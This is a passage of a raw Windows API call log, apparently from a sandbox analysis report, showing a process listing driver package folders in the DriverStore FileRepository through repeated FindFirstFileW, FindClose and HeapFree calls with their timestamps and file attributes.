ftLastWriteTime.dwLowDateTime=0x61bded14, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.595] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.595] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.595] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\faxca003.inf_amd64_neutral_5b8c7c1dda79bef4\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b3a6966, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6013d6c3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6013d6c3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.598] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.599] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\faxcn001.inf_amd64_neutral_d23021a1eb548156\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b465047, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60163824, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60163824, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.600] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.600] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.600] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\faxcn002.inf_amd64_neutral_3d392ccc357e04db\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b4d7468, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60163824, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60163824, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.601] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.601] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.601] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\fdc.inf_amd64_neutral_bbcfca39fdc02275\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43a9697e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62113d3e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x62113d3e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.602] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.602] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.606] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\flpydisk.inf_amd64_neutral_f54222cc59267e1e\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x439d829d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62113d3e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x62113d3e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.606] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.607] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.607] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\gameport.inf_amd64_neutral_fe5c4f29488f121e\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e1eb55b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x608adb91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x608adb91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.607] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.607] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.607] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hal.inf_amd64_neutral_232b95977cf6d84c\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42eafb68, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61f4acbb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61f4acbb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.608] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.608] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hcw72b64.inf_amd64_neutral_023772237d3a4ade\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4656f5cd, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65cbc50c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65cbc50c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.611] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.612] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.613] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hcw85b64.inf_amd64_neutral_22b436d5d06ab017\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x463803e9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65c23f8b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65c23f8b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.616] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.617] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.617] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hcw85c64.inf_amd64_neutral_96b71557b416d04a\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4648ad8b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65cbc50c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65cbc50c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.618] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.618] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.619] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hdaudbus.inf_amd64_neutral_4b99fffee061ff26\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3875ceff, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bbbb35f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bbbb35f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.619] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.619] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.619] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hdaudio.inf_amd64_neutral_ce7bc199c85ae0a0\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36dc624f, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b31a38f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b31a38f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.620] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.620] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hdaudss.inf_amd64_neutral_330a593eb888237c\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e50b241, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6091ffb2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6091ffb2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.620] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.620] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidbth.inf_amd64_neutral_8a1323fc68ad84af\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d865d49, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607a31ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607a31ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.621] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.621] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.621] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hiddigi.inf_amd64_neutral_12aaf5742a9969da\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43372771, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6200939c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6200939c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.622] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.622] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.622] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidir.inf_amd64_neutral_5b48c4b1b49ca54a\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d604745, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6077d08f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6077d08f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.622] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.622] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.622] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidirkbd.inf_amd64_neutral_2b561a02e977e2e3\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d781508, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6077d08f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6077d08f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.623] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.623] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidserv.inf_amd64_neutral_f2223e39f37c69f3\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x432da1f0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61fe323c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61fe323c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.624] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.624] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.624] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1nd.inf_amd64_neutral_cf39c48277e038de\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b549889, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60163824, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60163824, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.624] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.624] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.624] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1sd.inf_amd64_neutral_caaa16c52c48f8ac\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b5bbca9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60189984, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60189984, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.625] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.625] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.625] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1so.inf_amd64_neutral_4f1a3f1015001339\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b65422a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x601d5c44, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x601d5c44, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.626] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.626] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1ss.inf_amd64_neutral_8cae09a2238d64e0\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b6c664b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x601fbda5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x601fbda5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.626] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.626] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpsamd.inf_amd64_neutral_84ae149ecc9f8033\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3980691d, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bf011a5, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bf011a5, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.627] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.627] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.627] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iastorv.inf_amd64_neutral_668286aa35d55928\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x394e6c37, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3be8ed84, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3be8ed84, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.628] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.628] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.628] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\igdlh.inf_amd64_neutral_54a12b57f547d08e\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f35365b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60d4a63a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60d4a63a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.630] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.632] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.632] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iirsp.inf_amd64_neutral_25c14d33af7f54f1\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x425504b7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61dcdef8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61dcdef8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.632] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.632] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.636] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iirsp2.inf_amd64_neutral_9ed65fe0bab06b1b\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x425e8a38, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61df4058, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61df4058, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.636] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.637] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.637] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\image.inf_amd64_neutral_4a983035eaabe2f4\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ed860b0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60b5b456, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60b5b456, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.637] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.637] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.637] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\input.inf_amd64_neutral_8693053514b10ee9\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3904a18f, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x83f9555a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x3bcc5d01, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.638] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.639] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.639] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ipmidrv.inf_amd64_neutral_1cb648411f252d13\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a45fb54, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c35198d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c35198d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.640] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.640] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.640] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iscsi.inf_amd64_neutral_2ef24e9270d8b2a9\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, 